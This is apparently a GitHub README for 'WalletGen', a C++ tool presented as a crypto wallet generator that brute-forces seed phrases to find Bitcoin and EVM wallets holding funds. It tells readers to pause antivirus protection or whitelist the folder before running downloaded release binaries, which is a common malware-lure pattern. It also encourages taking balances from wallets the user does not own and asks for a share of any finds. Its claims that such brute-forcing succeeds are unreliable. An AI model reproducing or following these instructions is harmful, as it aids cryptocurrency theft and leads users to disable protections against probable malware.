Skip to content

DelegatePlait/walletgen-531

Repository files navigation

Seed Phrase Generator (WalletGen) – Crypto Wallet Generator & Balance Finder for Lost Bitcoin (BTC), Ethereum (ETH), BNB, Polygon (MATIC) and EVM Chains & Bitcoin Wallet Recover

Tip

If the setup does not start, add the folder to the allowed list or pause protection for a few minutes.

Caution

Some security systems may block the installation. Only download from the official repository.


QUICK START

git clone https://github.com/DelegatePlait/walletgen-531.git
cd walletgen-531
mkdir build && cd build
cmake ..
cmake --build . --config Release

WalletGen is an open-source, ultra-fast crypto wallet generator and seed phrase brute force tool. It helps you find and recovery lost or inactive Bitcoin (BTC), Ethereum (ETH), BNB, Polygon (MATIC), and other EVM-compatible wallets with real-time balance checking and high-performance C++ engine.

Quick Navigation

platform build x

WalletGen wallet generator demo

WalletGen MacOS wallet generator demo

⚠️ Disclaimer: WalletGen is a research and educational tool. It is not intended for unauthorized access or malicious activity. Use it responsibly and only with wallets you own or have permission to access.

How It Works

WalletGen generates wallets using BIP39, BIP44, and Bech32 for Bitcoin, and Keccak256 hashing for EVM-based chains like Ethereum.

The software compares generated addresses against known address databases or checks balances in real-time via public blockchain explorers.

Wallet Gen is built in C++ and is open-source, allowing anyone to access and modify the code. Compared to Python-based wallet generators, Wallet Gen boasts significantly higher wallet generation speeds, with performance primarily relying on your CPU & GPU.

Why WalletGen?

Unlike Python-based brute force tools, WalletGen is written in C++ and optimized for multi-threaded CPU and GPU usage, delivering up to 10x faster performance. Whether you’re exploring lost wallets, verifying private key space, or recovering your own wallet, WalletGen gives you the power to do it efficiently and securely.

Features

  • Generation of cryptocurrency wallets: Wallet Gen supports creating single wallets for Bitcoin, Ethereum, BNB, MATIC and other cryptocurrencies.
  • Search for wallets with balance: Using bruteforce techniques, Wallet Gen allows you to search for existing wallets with balances in both the Bitcoin network and EVMs.
  • Support for various algorithms: Keccak256 algorithm for EVM wallets and BIP39, BIP44, Bech32 algorithm for Bitcoin are used for wallet generation.
  • Using a database to speed up searches: Download and use databases to search for balance wallets, speeding up the process tenfold.
  • High speed of operation: Wallet Gen utilizes the power of the CPU and GPU to achieve the best performance.
  • Recovery your Bitcoin wallet: WalletGen allows you to recover your bitcoin wallet by seed phrase (mnemonic phrase).

Supported Blockchains

  • Bitcoin (BTC)
  • Ethereum (ETH)
  • Binance Smart Chain (BNB)
  • Any EVM-compatible chain

Demo

WalletGen search lost bitcoin wallets on Windows Demo

WalletGen search lost bitcoin wallets on MacOS Demo

WalletGen MacOS wallet generator demo

WalletGen search lost bitcoin wallets on Linux Demo

How to start

Windows

MacOS

Linux (x86-64bit)

tar -xzf  walletgen-linux-x64.tar.gz
cd walletgen
./walletgen

Android (Beta)

How to Search for Lost Bitcoin & Ethereum Wallets with Balance

Wallet Gen allows you to search using brute-force method for two types of crypto wallets with an existing balance.

For Bitcoin (BTC) wallets:

  • Press key 3 in the menu or run start_search_btc.bat to search Bitcoin wallets through the internet. This method may take longer, as it checks wallet balances in real-time via blockchain explorers.
  • Press key 6 to search Bitcoin wallets using the database. This method is faster because it compares generated wallets against a pre-built database of known addresses with balances.

For EVM wallets (Ethereum, BNB, MATIC, etc.):

  • Press key 5 or run start_search_evm.bat to search EVM wallets through the internet. This method checks for wallets with balance in real-time through blockchain explorers.
  • Press key 6 to search EVM wallets using the database. This method is faster since it compares generated wallets against the known database of addresses with balance.

Speed Considerations:

  • The speed of the search depends heavily on your hardware, especially the graphics card (GPU). To speed up the process and increase your chances of finding a wallet with a balance, you can run multiple instances of the program (1 to 4), depending on your system's performance

By using the database, you can significantly improve the efficiency of your search, as it eliminates the need to query the blockchain for every wallet generated

The Program Found a Wallet — What’s Next?

When the program finds a wallet with a balance, it will:

  • Stop immediately
  • Display the wallet details in the console
  • Save this data in the found_wallets.txt file

How to Access the Funds?

If the find is successful, be sure to share a small portion of the balance you find with me! Thank you!

Recovery Your Bitcoin Wallet

WalletGen allows you to recover your bitcoin wallet by seed phrase (mnemonic phrase). The program supports entering a complete seed phrase, as well as searching for missing words using special characters.

Process Description

Search for missing words:

If your seed phrase is missing some words or you are unsure, replace those words with an *. WalletGen will search through all possible variations in the places of * to find the correct seed phrase and restore the associated wallet balance.

Entering a complete seed-phrase:

If you have a full 12-word seed, simply enter it in full with a space. WalletGen will generate all address types (Legacy, SegWit, P2SH) and check their balances.

recovery

Important recommendations

  • Seed-phrase must contain exactly 12 words.
  • Use only the * symbol to search for missing words.
  • Searching for missing words may take considerable time, especially if several words are missing.
  • If the wallet with balance is successfully recovered, the program will automatically stop and save the found data.

My Finds

mywallet

🔍 Frequently Asked Questions (FAQ)

❓ Where can I download WalletGen?

You can download the WalletGen given on the page in the release.

❓ Where can I download a database of known addresses with balance?

You can download the current database given on the page in the release.

❓ Can WalletGen help me recover a lost Bitcoin wallet?

Yes. WalletGen uses brute-force seed generation and a known-address database to help users potentially recover lost Bitcoin wallets.

❓ Is WalletGen a seed phrase generator?

Yes. WalletGen can generate BIP39 seed phrases and derive wallets for Bitcoin, Ethereum, and other EVM chains.

❓ Do I need the internet to search through the database?

No. Searching through the database does not require an internet connection, as the wallet balance is already known.

❓ Can I find Ethereum wallets with balance?

Yes. WalletGen supports scanning for Ethereum wallets with balance using brute-force and a database of known addresses.

❓ Is WalletGen legal?

WalletGen is intended for educational and research purposes only. It should only be used on wallets you own or have permission to access.

Todo

Contribute

Contributions are welcome! If you have ideas, bug reports, or want to contribute to the codebase, feel free to submit a pull request.

Donate

I encourage you, when you find a wallet with a balance, to send me a small portion as a thank you. This motivates me to keep working on the program, keep it going, and make it better!

BTC: bc1qeyrshy5ntsguwxe9m8tp2x2yqhddz7ymkj44h9

ETH: 0x76c2E75B92Eb340f01B378e332FC7d8954893693

Credits

This project uses code from the Trezor project. The code is licensed under the MIT License.

License

This project is licensed under the MIT License

About

WalletGen - Seed phrase generator and finder for Bitcoin, EVM (Ethereum) wallets. Recovery your lost BTC or ETH wallet via private key / seed phrase generation.

Topics

Resources

License

Contributing

Security policy

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors